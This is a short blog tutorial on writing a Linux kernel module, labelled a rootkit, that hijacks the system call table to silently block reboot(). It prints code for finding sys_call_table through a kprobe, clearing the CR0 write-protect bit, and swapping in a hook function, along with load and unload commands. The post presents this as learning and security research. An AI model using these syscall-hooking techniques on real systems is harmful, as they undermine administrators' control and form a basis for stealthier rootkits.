How to Block Linux Reboots Using a Kernel Module

March 20, 2025
Cybersecurity & Hackingkernellinuxsyscallsrootkit

How to Block Linux Reboots Using a Kernel Module

Ever wondered what it takes to intercept system calls at the kernel level? In this post, I'll walk you through a project how to build a kernel module that hooks into Linux's reboot() syscall and silently blocks it. Why? For fun, learning, and security research.

๐Ÿ”— Check out the complete project on GitHub

๐Ÿ” The Idea

The core concept is simple: hijack the Linux system call table, replace the reboot() entry with our own function, and stop reboots cold.

This involves:

  • Finding the system call table (sys_call_table)
  • Disabling write protection temporarily using CR0 manipulation
  • Hooking into __NR_reboot
  • Logging and blocking the call

๐Ÿงฌ Deep Dive Into the Code

Here's how to locate the system call table using kprobes:

1static struct kprobe kp = {
2  .symbol_name = "kallsyms_lookup_name"
3};
4
5unsigned long *get_system_call_table_address(void) {
6  kallsyms_lookup_name_t kallsyms_lookup_name;
7  register_kprobe(&kp);
8  kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
9  unregister_kprobe(&kp);
10  return (unsigned long*)kallsyms_lookup_name("sys_call_table");
11}

Then, disable write protection:

1#define disable_write_protection() my_write_cr0(read_cr0() & (~0x10000))
2#define enable_write_protection() my_write_cr0(read_cr0() | (0x10000))
3
4static void my_write_cr0(long value) {
5  __asm__ volatile("mov %0, %%cr0" :: "r"(value) : "memory");
6}

And finally, hijack the reboot syscall:

1asmlinkage int hackers_reboot(int magic1, int magic2, int cmd, void *arg) {
2  if(enable_reboot) {
3      return old_reboot_sys_call(magic1, magic2, cmd, arg);
4  }
5  printk(KERN_NOTICE "EHROOTKIT: Blocked reboot Call");
6  return EPERM;
7}

๐Ÿงช Testing the Module

1make
2sudo insmod reboot_blocker.ko

Try running reboot or shutdown now and... nothing. The module blocks it silently (and logs it to the kernel log).
To remove:

1sudo rmmod reboot_blocker

๐Ÿค“ Lessons Learned

  • Intercepting syscalls is a powerful (and dangerous) ability.
  • Linux kernel modules give you deep access to OS internals.
  • Even one-line mistakes in kernel space can crash the whole system ๐Ÿ˜…

Stay curious. Stay ethical. Hack the planet. ๐ŸŒ